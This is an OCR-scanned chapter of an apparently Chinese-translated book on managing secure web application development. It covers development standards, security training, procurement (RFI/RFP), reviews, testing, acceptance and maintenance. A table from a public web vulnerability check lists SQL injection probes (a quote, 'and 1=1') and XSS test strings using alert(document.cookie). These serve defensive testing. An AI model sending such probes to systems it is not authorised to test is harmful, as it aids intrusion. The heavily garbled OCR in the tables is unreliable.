图 8-1 从 软件 开发 中 发 包 方 和 承包 方 的 立场 ， 按 照 开 发 过 程 的 各 个 阶段 (从 规划 、 招 标 直 
到 运 维 )， 对 在 开发 中 涉及 安全 性 的 关键 因素 进行 了 整理 。 首 先 ， 需要 在 开发 开始 之 前 先 制定 开 
发 体制 ， 因 此 制定 开发 标准 、 培 养 信息 安全 责任 人 、 对 开发 团队 进行 安全 教育 就 显得 尤为 重 
要 。 图 8-1 描述 了 项 目 双 方 在 开发 过 程 中 各 个 阶段 重要 注意 的 事项 。 


图 8-1 开发 安全 的 应 用 程序 需要 的 管理 概要 































































































方 注意 要 点 乙方 注意 要 点 参考 章节 
强化 开发 体制 
项 目 开 始 以 前 * 制定 开发 标准 82 节 





























“对 开发 人 员 进 行 培训 
。 培养 安全 负责 人 








































































































































































































































































































重要 安全 性 功能 讨论 通过 RFI 回答 强调 安全 的 重要 性 
规划 利用 RFI 等 掌握 预算 8.3.1 节 
确保 安全 方面 的 预算 
加 明确 安全 上 的 功能 需求 安全 功能 的 实现 方法 
招标 制作 并 公布 RFP 发 体制 ,测试 方法 的 说 明 8.3.2 节 
选择 承包 商 发 标准 等 说 明 
需求 分 析 确定 安全 功能 需求 833 节 
制定 项 目 安全 标准 
以 瀑布 方式 展开 对 安全 性 功能 
概要 设计 进行 细 化 8.3.4 节 
在 架构 设计 阶段 制定 安全 性 Bug 
相关 的 详细 开发 标准 
详细 设计 通过 设计 Review 检查 设计 是 否 835 节 
遵守 了 开发 标准 人 
编码 通过 代码 Review 检查 编码 是 否 835 节 
遵守 了 开发 标准 一 
通过 安全 性 测试 检查 是 否 存在 漏洞 
测试 通过 功能 测试 判断 是 否 满足 安全 功 8.3.8 节 
在 验收 阶段 检查 
验收 在 验 站 阶段 检查 839 洲 








安全 性 功能 








运 维 打 补 丁 8.3.10 节 
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8.2 ”开发 体制 


完备 的 开发 体制 对 于 开发 安全 的 应 用 来 讲 至 关 重 要 。 一 个 好 的 开发 体制 ， 要 从 开发 标准 等 文 
档 (〈 物 ) 和 训练 有 素 的 团队 (人 ) 两 方面 着 手 。 








令 开发 标准 的 制定 
就 笔者 的 咨询 经 验 来 看 ， 对 于 开发 安全 的 应 用 来 说 ， 性 价 比 最 高 的 措施 就 是 整理 出 一 份 好 的 
开发 标准 ( 安全 指南 ) 了 。 一 个 好 的 开发 标准 需要 满足 以 下 条 件 。 


不 能 太 厚 ( 只 限于 实用 性 较 高 的 项 目 ) 
方便 查找 想 参考 的 内 容 

明确 记载 应 该 实施 的 措施 

持续 改进 


虽然 制定 开发 标准 的 企业 越 来 越 多 ,但 笔者 曾 看 到 过 开发 标准 很 多 都 是 厚 厚 的 一 个 大 文件 
来， 而 且 内 容 都 很 抽象 ,阅读 起 来 都 很 费力 。 开 发 标准 是 给 开发 工程 师 阅读 的 ， 因 此 只 选取 最 有 
用 的 标准 ， 将 它 做 得 注 一 些 ， 对 降低 开发 成 本 也 能 起 到 一 定 的 作用 。 
男 外 即使 开发 本 里 不 在 本 公司 内 进行 而 是 承包 给 其 他 公司 ， 也 应 该 制定 一 份 开 发 标准 ， 在 招 
标的 时 候 作 为 安全 性 需求 附件 提供 给 投标 方 。 这 样 也 能 取得 很 好 的 效果 。 
在 开发 标准 中 应 该 记载 下 面 列 出 的 一 些 重要 项 目 。 
针对 每 种 漏洞 的 对 应 方法 
用 户 认证 、 会 话 管理 、 日 志 输出 等 实现 方法 
各 个 阶段 的 评审 (Review ) 和 测试 方法 (时 间 、 人 员 、 对 象 、 方 法 ) 
项 目 验 收 ( 发布 ) 评判 标准 ( 人员、 时 间 、 有 具体 合格 标准 ) 



























































令 教育 培训 
虽然 很 多 企业 制定 了 开发 标准 ， 但 遗憾 的 是 就 现在 能 真正 使 用 这 些 开发 标准 的 企业 还 很 少 。 
究 其 原因 无 外 乎 是 之 前 讲 过 的 ， 要 么 是 因为 开发 标准 的 内 容 不 太 现 实 ， 要 么 就 是 团队 (或 公司 ) 
还 没有 建立 一 个 能 严格 遵守 开发 标准 的 组 织 框架 。 
为 了 能 按照 开发 标准 进行 开发 ， 需 要 遵循 以 下 一 些 要 点 。 
开发 标准 本 身 的 内 容 (参考 上 面 内 容 ) 
在 团队 内 展开 开发 标准 培训 
通过 设计 评审 、 代 码 评审 来 检查 开发 标准 的 执行 情况 
其 中 ， 关 于 开发 标准 培训 中 培训 内 容 的 关键 点 有 以 下 几 点 。 
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事件 、 事 例 的 介绍 (提高 大 家 对 安全 性 的 重视 程度 ) 

常见 漏洞 的 原理 及 其 影响 

必须 遵守 的 事项 

此 外 每 个 团队 最 好 都 能 培养 出 自己 团队 内 部 的 安全 责任 人 。 安 全 负责 人 的 主要 职责 包括 以 下 
几 点 。 








制定 、 维 护 开发 标准 
展开 开发 标准 培训 
参加 评审 
进行 安全 测试 
监测 各 种 漏洞 信息 
以 安全 负责 人 为 中 心 ， 不断 地 完善 开发 标准 的 同时 ， 持 续 对 开发 团队 进行 安全 培训 ， 就 会 提 
高 团队 开发 出 安全 应 用 程序 的 能 力 。 
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8.3 ”开发 过 程 


本 节 我 们 将 对 开发 安全 应 用 程序 的 开发 流程 进行 说 明 。 以 下 说 明 中 虽然 都 是 以 应 用 程序 外 
包 开 发 为 例 , 但 是 自己 公司 内 部 开发 时 ,除了 角色 担当 不 同 之 外 ， 其 所 需要 实施 的 内 容 都 是 一 
样 的 。 








8.3.1 规划 阶段 的 注意 事项 


在 规划 阶段 非常 重要 的 一 件 事 就 是 要 确保 开发 中 和 安全 性 相关 的 内 容 的 预算 。 

要 做 预算 的 话 必须 先 对 安全 性 需求 的 整体 内 容 进行 讨论 。 把 应 用 程序 开发 外 包 时 ， 或 者 需要 
从 外 部 调配 安全 产品 时 ， 可 以 在 规划 阶段 制作 RFI ( Request For Information， 信 息 提供 要 求 书 )， 
向 承包 商 提供 应 用 程序 的 概要 和 重要 信息 列表 ， 并 要 求 承 包 商 提供 关于 提高 系统 安全 性 所 需要 的 
对 策 及 大 概 的 预算 等 信息 。RFI 同时 也 可 以 作为 对 承包 商 的 第 一 次 审查 ， 可 以 在 这 个 阶段 去 评价 
承包 商 的 意欲 与 能 力 。 























8.3.2 ”招标 时 的 注意 事项 


招标 时 会 由 发 包 方 编写 RFP (Request For Proposal， 需 求 建议 书 )， 让 承包 方 据 此 进行 估算 并 
投标 。 关 于 安全 性 的 功能 需求 也 需要 写 在 RFP 中 。 由 于 RFP 是 进 预 算 的 前 提 ， 所 以 在 RFP 中 明 
确 记 载 安 全 性 需求 是 非常 重要 的 。 





























这 里 我 们 需要 将 安全 性 功能 (需求 ) 和 安全 性 Bug 分 开 考 虑 。 首 先 安全 性 功能 需求 的 成 本 投 
入 和 效果 是 成 正比 的 ， 我 们 需要 基于 规划 阶段 的 讨论 结果 来 决定 是 否 需 要 实现 这 些 安 全 性 功能 3 


记录 到 RFP 中 。 

另 一 方面 ， 对 安全 性 Bug 的 需求 往往 是 很 模糊 的 内 容 ， 即 使 记述 到 RFP 中 ， 如 果 不 能 通过 
测试 来 验证 的 话 ， 也 没有 意义 的 。 关 于 安全 性 Bug， 可 以 考虑 像 下 面 这 样 向 承包 商 提出 比较 具体 
的 要 求 。 


列举 出 需 对 应 的 漏洞 的 名 称 

明确 标明 验收 方法 和 验收 标准 

如 果 有 需要 追加 的 对 策 则 要 求 承 包 商 作出 相应 提案 

要 求 承包 商 提供 安全 性 能 测试 方法 的 说 明 ， 并 将 测试 结果 作为 项 目 交付 物 提 交 
明确 项 目 验收 后 发 现 的 漏洞 的 应 对 方法 及 费用 承担 情况 

要 求 承包 商 对 开发 体制 做 出 说 明 

要 求 承包 商 提供 开发 标准 和 安全 性 测试 报告 书 样本 
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专栏 : 谁 应 该 对 安全 漏洞 负责 ? COLUMN 




















安全 漏洞 的 责任 在 于 发 包 方 ， 还 是 承包 方 ， 这 是 个 问题 。 笔 者 认为 在 这 种 将 项 目 委托 给 承 
方 进行 开发 的 体制 中 ， 风 险 的 责任 应 该 由 发 包 方 来 承担 。 原 因 是 需求 文档 是 由 发 包 方 提供 给 承 人 
方 的 ， 而 且 法 律 上 也 没有 对 关于 开发 的 应 用 程序 中 出 现 漏洞 时 的 责任 做 出 明确 的 规定 "。 

另外 ， 经 济 产业 省 刊 发 的 《信息 系统 、 交 易 模型 与 合同 ( 模型 合同 ))[1] 中 有 以 下 的 描述 。 























中 





















































































































































关于 和 本 软件 相关 的 安全 方面 的 对 策 ， 包 括 具 体 的 功能 、 遵 守 方法 、 管 理 体制 以 及 费用 承担 等 在 
其 他 条 款 另 行 约定 ( 参考 第 50 条 )。 当 架构 设计 ( 系统 设计 ) 里 包含 安全 性 功能 需求 时 ，( 发 生 的 
问题 ) 则 符合 “与 系 架构 设计 不 一 致 "， 属 于 本 条 所 描述 的 “缺陷 ”问题 。 





































































































也 就 是 说 ， 系 统 设计 文档 里 中 没有 明确 记载 的 内 容 不 能 算 作 缺陷 ?。 因 此 ， 站 在 发 包 方 的 立 
场 考虑 ， 为 了 自我 保护 就 必须 在 合同 和 需求 文档 中 明确 标明 安全 性 方面 的 要 求 。 

那 是 不 是 承包 方 在 客户 没有 明确 提出 安全 上 的 相关 需求 时 ， 就 可 以 不 做 任何 安全 对 策 了 呢 ? 
笔者 并 不 这 么 认为 。 笔 者 认为 至 少 要 对 安全 漏洞 采取 必要 的 措施 。 作 为 承包 方 ， 即 便 是 客户 方 没 
有 明确 要 求 ， 也 应 该 对 安全 性 的 重要 性 进行 说 明 ， 并 努力 让 安全 需求 得 到 客户 理解 ， 并 将 其 写 入 
RFP 中 。 所 以 ， 回 答 规划 阶段 RFI 的 安全 性 问题 并 强调 其 重要 性 是 非常 重要 的 。 





























































































































8.3.3 ”需求 分 析 时 的 注意 事项 


在 需求 分 析 及 以 后 的 开发 阶段 ， 工 作 的 主体 就 转换 到 承包 方 了 。 在 需求 分 析 中 ， 也 需要 分 别 
对 安全 性 功能 和 安全 漏洞 进行 整理 。 

首先 ， 需要 发 包 方 在 需求 中 对 安全 功 性 能 进行 定义 。 

其 次 ,笔者 建议 在 应 对 安全 漏洞 这 个 问题 上 以 承包 方 (实际 进行 开发 的 公司 ) 的 开发 标准 为 
基础 。 如 果 不 遵循 开发 公司 平常 所 使 用 的 标准 的 话 ， 则 需要 对 开发 者 进行 再 培训 ， 这 样 必然 导致 
开发 成 本 上 升 。 通 过 对 比 顾客 的 RFP 或 需求 文档 中 所 记载 的 安全 要 点 和 承包 方 的 开发 标准 ， 进 
行 匹 配 度 分 析 ， 如 果 发 现 自己 开发 标准 中 不 合适 的 地 方 则 进行 相应 的 补充 ， 逐 渐 完善 项 目的 开发 
标准 ( 如 图 8-2 )。 





























中 个 人 信息 保护 法 是 针对 Web 应 用 的 运营 方 ( 即 发 包 方 ) 的 规定 。 并 且 软 件 不 属于 制造 物 责 任 法 所 限制 的 对 象 范围 内 。 
关于 制造 物 责 任 法 可 以 参考 http://www.consumer.go.jp/Kankeihourei/seizoubutsu/pl-j.html 
@ ”模型 合同 的 “安全 对 策 ” 指 的 就 是 本 书 所 述 安 全 性 功能 需求 ， 而 不 是 指 安 全 性 漏洞 。 
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图 8-2 ”以 承包 方 的 开发 标准 为 基础 做 成 的 项 目 开 发 标准 








发 | ”规划 /招标 需求 分 析 概要 设计 








安全 性 功能 需求 








十 曙 泪 



















































































架构 设计 文档 







































































过 略 广 


体 化 
详细 化 
























































在 进行 需求 分 析 时 ， 讨 论 重心 除了 上 图 8-2 的 内 容 之 外 ， 还 应 包括 下 述 内 容 。 


用 户 认 证 、 账 号 管理 、 授 权 管理 方面 的 需求 (参考 5.1 一 5.3 节 ) 
日 志 管理 方面 的 需求 (参考 5.4 节 ) 

其 他 安全 性 功能 需求 

选择 基础 软件 和 确定 打 补 丁 的 方法 (参考 7.1.3 市) 

分 析 开 发 标准 和 安全 性 需求 间 的 差距 











8.3.4 概要 设计 的 推进 方法 
本 节 主 要 对 概要 设计 的 推进 方法 进行 说 明 。 安 全 性 功能 与 普通 的 功能 要 点 一 样 ， 只 要 严格 执 
行 瀑布 式 的 设计 、 开 发 、 测 试 就 可 以 了 。 
关于 安全 性 Bug 的 处 理 ， 我 们 要 把 需求 分 析 时 所 确定 的 开发 标准 进行 细 化 ， 一 直 细 化 到 可 
直接 写 代 码 的 水 平 ， 然 后 根据 安全 测试 方法 记录 到 架构 设计 书 中 。 
在 概要 设计 阶段 需要 实施 的 项 目 主要 有 以 下 几 项 。 
对 安全 性 功能 进行 细 化 
对 开发 标准 进行 细 化 ， 确 定 测试 方法 
在 界面 设计 时 对 安全 功能 进行 确认 
罗列 出 需要 进行 CSRF 对 策 的 页 面 
罗列 出 需要 使 用 HTTPS 的 页 面 
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8.3.5 详细 设计 和 编码 阶段 的 注意 事项 

详细 设计 阶段 之 后 的 工作 就 是 按照 概要 设计 进行 设计 和 开发 。 每 个 阶段 都 要 进行 设计 评审 、 
代码 评审 ， 以 检查 是 否 严格 遵守 了 开发 标准 和 开发 方法 。 虽然 评审 过 程 可 以 省 略 ， 但 我 们 在 这 里 
建议 一 定 要 执行 评审 过 程 。 











8.3.6 安全 性 测试 的 重要 性 及 其 方法 


无 论 是 安全 性 Bug 还 是 安全 性 功能 需求 ， 最 终 都 要 通过 测试 来 验证 开发 出 的 产品 是 否 满足 
需求 。 发 包 方 也 要 在 验收 的 时 候 进 行 安全 性 测试 。 

实施 安全 性 测试 (也 可 以 称 为 漏洞 检查 、 漏 洞 诊断 ) 的 方法 有 如 下 几 种 : 

委托 专家 进行 漏洞 诊断 
使 用 专业 工具 进行 诊断 
进行 自我 诊断 

专家 诊断 的 特点 是 检查 精度 高 ， 漏 洞 导致 的 影响 报告 详细 ， 但 所 花费 成 本 比较 高 "。 

在 Web 应 用 程序 漏洞 检查 工具 中 ， 比 较 有 名 的 是 IBM 的 RationalAppScan，HP 的 HP 
WebInspect software 等 “， 但 这 两 个 工具 都 需要 至 少数 百 万 日 元 ( 相当 于 十 几 到 数 十 万 人 民 币 ) 的 
初期 投入 。 最 近 无 论 是 承包 公司 还 是 发 包公 司 ， 有 越 来 越 多 的 公司 都 用 漏洞 检查 工具 来 对 本 公司 
的 Web 应 用 实施 安全 性 测试 。 

关于 最 后 的 自我 诊断 方法 ， 由 于 之 前 没有 太 多 公开 的 关于 安全 测试 的 方法 等 信息 ， 所 以 很 多 
公司 不 知道 如 何 去 实 施 安 全 性 测试 。 作 为 安全 性 诊断 的 方法 ,我 们 下 面 以 地 方 自治 信息 中 心 发 布 
的 “Web 健康 诊断 基准 ”为 例 进行 介绍 。 





















































8.3.7 ”Web 健康 诊断 基准 


Web 健康 诊断 是 地 方 自治 信息 中 心 (LASDEC ) 面向 地 方 公共 团体 实施 的 Web 网 站 进行 的 漏 
洞 诊断 。 这 是 一 种 为 了 判断 是 否 需 要 更 精确 的 漏洞 诊断 而 进行 的 一 种 简易 检查 方法 。 检 查 的 基 
准 公 布 在 了 LASDEC 的 主页 ( https://www.j-lis.go.jp/lasdec-archive/cms/12,23183,84.html )。 

这 个 Web 健康 诊断 基准 可 以 广泛 用 来 对 Web 应 用 进行 安全 性 检查 ， 其 特征 如 下 。 


























中 本 书 都 是 基于 实际 情况 写 的 ， 实 际 上 各 个 专家 厂商 的 能 力 和 价格 相差 很 大 。 

@ 还 有 三 个 开源 软件 也 比较 常用 : 
WebScarab: https://www.owasp.org/index.php/Category:OWASP_ WebScarab_ Project 
OpenVAS: http://www.openvas.org/index.html 
w3af: http://w3af.org/ 





译 者 注 
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履 盖 危险 程度 较 高 的 12 项 漏洞 

明确 定义 了 诊断 基准 、 判 断 标准 、 抽 样 标准 
通过 Fiddler 等 免费 工具 即 可 进行 诊断 

是 以 正式 网 站 为 对 象 ， 安 全 性 较 高 的 诊断 基准 
不 对 漏洞 的 影响 程度 和 影响 范围 做 判断 

只 是 简易 的 检查 ， 不 做 深度 检查 


下 图 8-3 是 Web 健康 诊断 基准 里 面 关 于 SQL 注入 攻击 和 跨 站 脚本 攻击 的 检测 示例 。 


图 8-3” Web 健康 诊断 基准 


2.4 关于 诊断 时 各 条 目的 检测 模式 、 是 否 存 在 漏洞 的 判断 标准 
以 下 是 各 诊断 条 目的 检测 模式 、 是 否 存 在 漏洞 的 判断 标准 。 严 格 来 说 ， 本 基 ; 
洞 的 可 能 性 很 高 ”的 意思 ， 并 不 保证 这 个 漏洞 100% 存在 。 
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判断 的 结果 只 是 “存在 该 漏 











哥 




















(A) SQL 注入 攻击 












































检测 模式 是 否 存在 漏洞 的 判断 标准 参考 ( 是 否 存在 漏洞 的 判断 标准 的 详细 信息 等 ) 
如 果 HTTP 返回 体 ( Response ) 里 面 有 DBMS 等 
1 | [JJ (1 个 单 引号 ) 程序 报错 的 输出 错误 信息 (SQLException，Query failded 
等 ) 的 话 ， 就 可 以 认为 是 程序 发 生 了 错误 























并 且 HTTP 返回 体 里 不 同 的 内 容 





HTTP 状态 码 相 同 
































































































































































































































比较 | 搜索 字符 串 ] 和 「 搜 i 百分比 ( 通过 diff 等 ) 不 超过 6% 即 认为 两 个 请 求 返 
2 | 索 字 符 串 and a'-a | 人 回 结果 相同 。 如 果 进 行 测试 的 是 查询 功能 ， 那 么 如 
果 返 回 结果 的 条 数 一 致 ， 也 可 以 认为 是 结果 相同 。 
比较 | 搜索 数字 | 和 | 搜索 和 E 
3 数字 and 1=1 | 两 次 请 求 结果 一 样 四 本 
(B ) 跨 站 脚本 攻击 ( XSS ) 
检测 模式 是 否 存在 漏洞 的 判断 标准 参考 ( 是 否 存在 漏洞 的 判断 标准 的 详细 信息 等 ) 
1 | Reshrs 没 被 转 义 ， 直 接 被 输出 到 客 | 在 HTTP 返回 体 的 Body 里 检查 测试 字符 串 ， 如 果 
户 端 没有 被 转 义 输出 的 话 ， 就 认为 是 系统 存在 漏洞。 
[| '>">alert(document. | 没 被 转 义 ， 直接 被 输出 到 客 司 上 
cookie)</ script> | 户 端 
人 同上 。 将 测试 字符 串 不 做 编码 直接 插入 到 网 
3 [alertdocumentcookiej</ | 没 被 转 义 ， 接 被 输出 到 客 HE http://www.xxxx.jp/service/index.html 中 的 











Scri pt> 户 端 襄 
pt>] 师 Tindex.html | 部 分 。 


HTTP 返回 Body 里 URI 属性 ( src, action, background, 

| javascript:alert(document. | 、 href, content ) 或 JavaScript 代码 (location.href 
4 . 设置 为 href 属性 值 ek 
cookie); | 被 设 局 性 location.replace ) 等 属性 被 设置 为 测试 字符 串 时 ， 就 
可 以 认为 是 存在 漏洞 。 


Web 健康 诊断 实际 上 是 抽样 检查 ， 抽 样 标准 也 是 公开 的 ， 使 用 这 些 检测 模式 就 可 以 对 应 用 
旦 序 做 整体 测试 。 图 8-4 是 利用 Web 健康 诊断 基准 进行 的 系统 安全 检查 的 示例 。 
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如 右 图 所 示 ， 利 用 Web 健康 诊断 基 图 8-4 利用 Web 健康 诊断 基准 进行 安全 检查 
准 ， 在 浏览 器 或 者 代理 工具 (Fiddler 等 ) 四 确认 基准 
里 输入 检测 模式 ， 通 过 确认 服务 器 返回 的 
应 答 来 进行 检查 。 这 种 检查 不 需要 熟悉 源 















































代码 或 者 了 解 内 部 构造 ， 只 使 用 了 攻击 者 De 
也 能 获取 到 的 信息 进行 测试 。 这 种 方法 是 ”区 5289 er 


一 种 黑 盒 测 试 方式 。 























8.3.8 承包 方 测试 


尽管 现在 在 开发 过 程 中 就 进行 安全 性 测试 的 团队 还 比较 少 ,但 笔者 还 是 强烈 建议 在 开发 中 就 
穿插 进行 安全 性 测试 。 

开发 人 员 进 行 安全 性 测试 主要 有 以 下 方法 。 

代码 检查 使 用 工具 进行 黑 盒 测试 手动 进行 黑 盒 测试 

这 里 我 们 将 只 对 代码 检查 和 手动 进行 黑 盒 测试 进行 说 明 。 

代码 检查 可 以 通过 目测 或 者 使 用 查找 工具 ( grep 等 ) 进行 "。 因 为 从 头 到 尾 将 代码 通读 一 遍 非 
常 费 时 费力 ， 所 以 我 们 可 以 以 开发 标准 为 基础 确认 开发 是 否 遵守 了 该 标准 。 代 码 检查 比较 适合 发 
现 以 下 几 种 潜在 威胁 。 



































SQL 注入 漏洞 目录 遍历 漏洞 OS 命令 注入 漏洞 
上 面 这 些 服务 需 内 部 发 生 的 漏洞 ， 从 外 边 是 很 难 判断 的 ， 如 果 从 代码 级 别 来 调查 的 话 反而 比 
较 简 单 快捷 。 








手动 黑 盒 测试 的 话 ， 可 以 使 用 前 面 讲 过 的 Web 健康 诊断 的 方法 。 系 统 安 全 隐患 的 很 大 一 部 
分 都 可 以 以 页 面 为 单位 进行 测试 ， 所 以 只 要 一 个 页 面 已 经 完成 ， 就 可 以 进行 安全 性 测试 了 。 提 前 
开始 实施 安全 性 测试 ， 会 减少 返工 ， 有 助 于 降低 项 目 成 本 。 

所 以 ， 综 合 上 述 几 点 ， 最 好 在 系统 架构 设计 的 时 候 就 制定 安全 测试 的 计划 。 





8.3.9 发 包 方 测试 ( 验收 ) 
笔者 见 过 很 多 在 招标 时 明确 将 系统 漏洞 对 策 作 为 系统 安全 性 功能 需求 的 发 包 方 ， 但 是 在 验收 


@D 也 存在 商用 的 代码 自动 检查 攻击 ， 本 书 里 将 不 对 此 做 出 说 明 。 
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时 进行 系统 漏洞 检测 的 发 包 方 并 不 多 见 。 实 际 上 ， 在 招标 时 已 经 明确 定义 的 安全 性 功能 需求 ， 在 
验收 时 也 需要 认真 验收 。 发 包 方 如 果 提 前 告知 承包 商 将 进行 安全 性 测试 的 话 ， 会 给 承包 商 一 些 压 
力 ， 也 会 让 其 加 强 体制 ， 有 一 定 的 有 利 影响 。 
关于 验收 时 的 漏洞 检测 ， 可 以 使 用 以 下 方法 。 
审查 承包 商 的 安全 测试 报告 (检查 文档 ) 
委托 第 三 方 (专家 ) 进行 测试 
自行 测试 
第 一 种 方法 ， 由 于 发 包 方 很 难 客观 地 检查 承包 商 提 供 的 文档 ， 所 以 不 推荐 使 用 。 第 二 种 方法 
通过 雇佣 第 三 方 来 实施 检测 ， 这 种 方法 虽然 在 检查 精度 和 客观 性 上 都 很 有 保障 ， 但 是 相应 的 成 本 
也 会 增加 。 如 果 预 算 不 多 的 话 ， 则 可 以 考虑 利用 Web 健康 诊断 基准 来 自己 进行 安全 测试 的 工作 。 























8.3.10 运 维 阶 段 的 注意 事项 
发 包 方 在 验收 了 承包 商 的 交付 物 之 后 ， 就 进入 运营 、 维 护 阶段 了 。 在 此 阶段 下 面 两 项 尤为 重要 。 


对 日 志文 件 的 监视 
漏洞 对 策 


另外 ， 还 需要 一 年 进行 一 到 两 次 Web 网 站 健康 诊断 。 之 所 以 这 么 做 是 出 于 以 下 两 个 目的 。 


对 上 次 诊断 之 后 新 增加 的 页 面 或 者 功能 进行 诊断 
检查 新 出 现 的 攻击 方法 的 对 策 


日 志 监 视 的 重要 性 已 经 在 5.4 节 介 绍 过 了 。 也 可 以 通过 iogScanner' 等 日 志 分 析 工 具 来 发 现 
潜在 的 攻击 行为 。 
根据 平台 和 应 用 的 不 同 漏洞 的 对 应 方法 也 不 一 样 。 平 台 的 漏洞 可 以 参考 7.1 节 介 绍 过 的 内 
容 ， 随 时 关注 各 种 安全 漏洞 ， 适 时 地 实施 安全 对 策 ( 打 补 丁 等 )。 
而 就 应 用 程序 本 身 来 说 ， 发 现 系统 漏洞 的 途径 主要 有 以 下 几 种 。 
定期 Web 健康 诊断 时 发 现 的 漏洞 
从 日 志 分 析 判 断 
外 部 报告 的 漏洞 
不 管 是 哪 种 情况 ， 尽 早 发 现 并 修补 漏洞 都 是 最 重要 的 。 为 了 方便 地 获取 外 部 报告 的 漏洞 ， 最 
好 设置 一 个 问题 报告 中 心 >。 












































Q ogScanner 是 独立 行政 法 人 信息 处 理 推 进 机 构 免 费 发 布 的 日 志 分 析 攻 击 ， 它 会 从 日 志 里 寻找 SQL 注入 攻击 等 攻击 的 
痕迹 。http:/www.ipa.go.jp/security/vulyiLogScannerindex.html 
@) 漏洞 报告 中 心 的 例子 可 以 参考 微软 的 安全 技术 中 心 。http:/technet microsoft.com/zh-cn/security/ff852094 
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8.4 总 结 


本 章 对 在 开发 安全 的 Web 应 用 程序 中 需要 进行 的 管理 进行 了 说 明 。 制 定 开 发 标准 ， 并 且 对 
开发 成 员 进 行 安全 培训 ， 从 这 两 方面 着 手 建立 良好 的 开发 体制 ， 对 开发 出 安全 的 应 用 程序 来 说 至 

另外 ,在 对 Web 应 用 程序 进行 招标 时 ， 也 需要 在 RFP 里 写 入 关于 安全 性 功能 和 安全 性 Bug 
的 相关 需求 ， 并 且 在 验收 的 时 候 ， 进 行 安全 性 测试 。 
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本 的 攻击 ， 详 细 介 绍 了 安全 隐患 产生 的 原理 及 应 对 方法 ， 助 你 打造 安全 无 
虞 的 Web 应 用 。 


lh iTuring.cn 
热 内线 : (010)51095186 转 600 


计算 机 /安全 与 加 密 EN pe 4 4 1 


人 民 邮 电 出 版 社 网 址 : www.ptpress.com.cn ”定价 : 79.00 元 


